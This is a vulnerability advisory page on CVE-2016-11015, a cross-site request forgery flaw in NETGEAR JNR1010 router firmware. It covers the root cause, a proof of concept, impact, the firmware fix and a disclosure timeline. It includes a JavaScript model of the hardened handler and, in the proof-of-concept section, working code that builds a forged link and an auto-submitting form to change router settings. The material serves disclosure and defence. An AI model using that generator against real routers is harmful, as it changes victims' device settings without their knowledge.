Securin Zero Days
Severity: Medium · CVSS 6.5 · Patched · EPSS 0.00244%

    Cross-Site Request Forgery in Netgear Router

    NETGEAR JNR1010 devices before 1.0.0.32 allow cgi-bin/webproc CSRF via the :InternetGatewayDevice.X_TWSZ-COM_URL_Filter.BlackList.1.URL parameter.

CVE ID: CVE-2016-11015
CVSS v3.1: 6.5 Medium
Vendor: NetGear
CWE: CWE-352
Disclosed: Oct 28, 2015
Status: Fixed
• 01 Description
• 02 Proof of Concept
• 03 Impact
• 04 Remediation
• 05 Timeline
• 06 References
    01/Description

    What this actually is.

    Technical background, root cause, and affected surface.

A cross-site request forgery vulnerability was identified in NETGEAR JNR1010 devices running firmware before 1.0.0.32. The cgi-bin/webproc endpoint accepts a state-changing request that sets the InternetGatewayDevice.X_TWSZ-COM_URL_Filter.BlackList.1.URL parameter without verifying that the request was submitted from the router's own web UI, so a request forged by a page on another origin is processed as if the logged-in user had submitted it. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device.

    Vendor
    NetGear
    Affected Product
    JNR1010_firmware
    CVE
    CVE-2016-11015
    Securin ID
    2016-CSW-01-1016
    Status
    Fixed
    Date
    October 28, 2015
    Severity
    Medium
    CVSS Score
    6.5
    Vector
    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    CWE
    CWE-352
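To make the root cause concrete, the following is an added example written for this page (JavaScript, not Netgear firmware code and not part of the Securin advisory). It models cgi-bin/webproc twice: once checking only the session cookie, which is the behaviour that makes the CSRF possible, and once also requiring a same-host Origin/Referer header and a per-session anti-CSRF token. The parameter name is taken from the advisory; the router address 192.168.1.1, the URL-encoded POST body, the cookie and token values, the csrf_token field name and the blocked-site values are all assumptions made for the example.

```javascript
// Added example: a model of how cgi-bin/webproc handles a URL-filter change,
// not the device's actual code. Everything except the parameter name is assumed.
const ROUTER_HOST = "192.168.1.1";                                          // assumed LAN address
const BLACKLIST_PARAM = ":InternetGatewayDevice.X_TWSZ-COM_URL_Filter.BlackList.1.URL";

// Constructed session table: session cookie -> anti-CSRF token for that session.
const SESSIONS = new Map([["sid=abc123", "tok-9f8e7d"]]);

// Shared tail of both handlers: apply the blocklist change if the field is present.
function applyChange(body, state) {
  if (!body.has(BLACKLIST_PARAM)) return { status: 400, state };
  return { status: 200, state: { ...state, blacklistUrl: body.get(BLACKLIST_PARAM) } };
}

// Vulnerable model: a valid session cookie is the only thing checked before the
// setting is applied. The browser attaches that cookie to any request aimed at
// the router, including one an attacker's page forged, so the change goes through.
function vulnerableWebproc(req, state) {
  if (req.method !== "POST") return { status: 405, state };
  if (!SESSIONS.has(req.headers.cookie)) return { status: 401, state };
  return applyChange(new URLSearchParams(req.body), state);
}

// True only if the given URL names the router itself as its host.
function sameHost(urlString) {
  try { return new URL(urlString).host === ROUTER_HOST; } catch { return false; }
}

// Hardened model: same handler plus (a) the Origin header, or Referer when Origin
// is absent, must name the router's own host, and (b) the form must carry the
// session's anti-CSRF token. A page on another origin can do neither.
function hardenedWebproc(req, state) {
  if (req.method !== "POST") return { status: 405, state };
  const cookie = req.headers.cookie;
  if (!SESSIONS.has(cookie)) return { status: 401, state };
  const source = req.headers.origin || req.headers.referer;
  if (!sameHost(source)) return { status: 403, state, reason: "cross-origin or no Origin/Referer" };
  const body = new URLSearchParams(req.body);
  if (body.get("csrf_token") !== SESSIONS.get(cookie)) return { status: 403, state, reason: "bad anti-CSRF token" };
  return applyChange(body, state);
}

// Constructed requests. The forged one is what the victim's browser sends after
// loading an attacker page: the router cookie is attached automatically, but Origin
// names the attacker's site and the form carries no token.
const forgedRequest = {
  method: "POST",
  headers: { cookie: "sid=abc123", origin: "http://attacker.example" },
  body: new URLSearchParams({ [BLACKLIST_PARAM]: "bank.example" }).toString(),
};

// A genuine submission from the router's own UI, for comparison.
const legitimateRequest = {
  method: "POST",
  headers: { cookie: "sid=abc123", origin: `http://${ROUTER_HOST}` },
  body: new URLSearchParams({ csrf_token: "tok-9f8e7d", [BLACKLIST_PARAM]: "ads.example" }).toString(),
};

// Run both handlers against both requests from an empty blocklist.
function demo() {
  const initial = { blacklistUrl: "" };
  return {
    forgedVsVulnerable: vulnerableWebproc(forgedRequest, initial),
    forgedVsHardened: hardenedWebproc(forgedRequest, initial),
    legitVsHardened: hardenedWebproc(legitimateRequest, initial),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The Origin check alone would already stop the forged request; the token is kept as well because some browsers and proxies strip Origin and Referer, and a handler that then falls through to "allow" is back to cookie-only authentication. Note that the hardened handler rejects a request with neither header rather than permitting it.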
    02/Proof of Concept

From one forged request
to changed router settings.

Reproduced in a sandboxed environment. The attacker needs no network access to the router: the forged request is issued by the victim's own browser, which must be able to reach the router's web interface (normally from the LAN or WiFi) while the victim is logged in to it.

CVSS 3.1: 6.5
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
Scope: Unchanged
Impact: C:N / I:H / A:N
Severity: Medium

We created a forged request to http://router-ip/cgi-bin/webproc that changes the value of the InternetGatewayDevice.X_TWSZ-COM_URL_Filter.BlackList.1.URL variable (any other variable accepted by the endpoint can be changed the same way) and delivered it to the victim as a malicious link. When the victim, who is logged in to the router, opens the link, the browser submits the request within the victim's session and the router applies the change. Because the request is sent from the victim's browser, an attacker with no session of their own can change the settings of the victim's router.

PoC · Exploitation Steps
Figure 01: Blocked-site keywords before the CSRF request was sent to the victim.
Figure 02: CSRF request created by changing the blocklist URL variable.
Figure 03: CSRF request successfully submitted in the victim's browser.

Note: in the same way, any other request to the web UI can be manipulated; the victim need only open a link generated by the attacker for the router settings to change without the victim's knowledge.
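What the attacker actually hosts, as an added example written for this page rather than code from the advisory or from Netgear: a generator for the two usual delivery forms of the forged request, a plain link the victim clicks and a page whose hidden form submits itself on load. The endpoint and parameter name come from the advisory. The router address 192.168.1.1, the blocked-site value, and the choice between a GET query string and a POST form body are assumptions, since the advisory does not say which method cgi-bin/webproc accepts.

```javascript
// Added example: builds the forged-request artefacts described in the PoC.
// Endpoint and parameter name are from the advisory; the rest is assumed.
const ROUTER_IP = "192.168.1.1";                                          // assumed
const WEBPROC = `http://${ROUTER_IP}/cgi-bin/webproc`;                     // from the advisory
const BLACKLIST_PARAM = ":InternetGatewayDevice.X_TWSZ-COM_URL_Filter.BlackList.1.URL";

// Escape a string for use inside an HTML attribute, so a value containing quotes
// or angle brackets cannot break the generated form.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Variant 1: a plain link. Clicking it makes the browser issue a GET to webproc
// with the blocklist parameter in the query string; the router cookie (or cached
// credentials) is attached automatically, which is the whole CSRF mechanism.
function buildCsrfLink(blockedUrl) {
  const u = new URL(WEBPROC);
  u.searchParams.set(BLACKLIST_PARAM, blockedUrl);
  return u.toString();
}

// Variant 2: a page with a hidden form that submits itself by POST as soon as it
// loads. The victim only has to open the page; no further click is needed.
function buildCsrfPage(blockedUrl) {
  return [
    "<!doctype html>",
    "<html><body>",
    `<form id="f" method="POST" action="${escapeHtml(WEBPROC)}">`,
    `<input type="hidden" name="${escapeHtml(BLACKLIST_PARAM)}" value="${escapeHtml(blockedUrl)}">`,
    "</form>",
    `<script>document.getElementById("f").submit();</script>`,
    "</body></html>",
  ].join("\n");
}

// Parse a link back the way the router's CGI would, to confirm the parameter name
// survives URL encoding of the ':' it starts with.
function paramFromLink(link) {
  return new URL(link).searchParams.get(BLACKLIST_PARAM);
}

console.log(buildCsrfLink("bank.example"));
console.log(buildCsrfPage("bank.example"));
```

Neither variant is sent anywhere by this code; it only produces the link and the page. The auto-submitting form is the one to expect in practice, because it works even when the endpoint ignores GET and it gives the victim nothing to inspect before the request goes out.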

    03/Impact

    What an attacker does to you.

    Post-exploitation outcomes mapped to CVSS impact metrics.

An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link while logged in. A successful exploit allows the attacker to perform arbitrary actions in the web UI with the privilege level of the affected user, for example adding or removing URL-filter entries as shown in the proof of concept.

    04/Remediation

    Fix it. In this order.

    A runbook, not a checklist. Sequence matters — assume compromise before you act.

Download firmware version 1.0.0.32 or later from the vendor and apply it as described in the vendor advisory. Until the update is installed, log out of the router's web interface when you are finished with it, since the forged request only succeeds while a session is active.

    Securin advisory — For coordinated remediation support or threat-actor briefings related to CVE-2016-11015, contact disclose@securin.io
    05/Disclosure Timeline

    Vendors moved in days.
    Attackers in hours.

    Reconstructed from vendor advisories, CISA bulletins, and Securin research records.

    Oct 28, 2015

Vulnerability discovered in Netgear JNR1010 router firmware version 1.0.0.24

    Oct 28, 2015

    Reported to vendor

    Nov 03, 2015

Netgear's technical team addressed the issue after follow-up

    Dec 13, 2015

Vulnerability fixed

    Dec 30, 2015

    Updated Netgear Router JNR1010 version 1.0.0.32 was released

    Disclosed 63 days after discovery

    06/References

    Cite, verify, go deeper.

Primary sources.

NVD — CVE-2016-11015
nvd.nist.gov/vuln/detail/CVE-2016-11015

Securin VI — Full Technical Analysis
vi.securin.io

    © 2026 Securin Inc · CVE Numbering Authority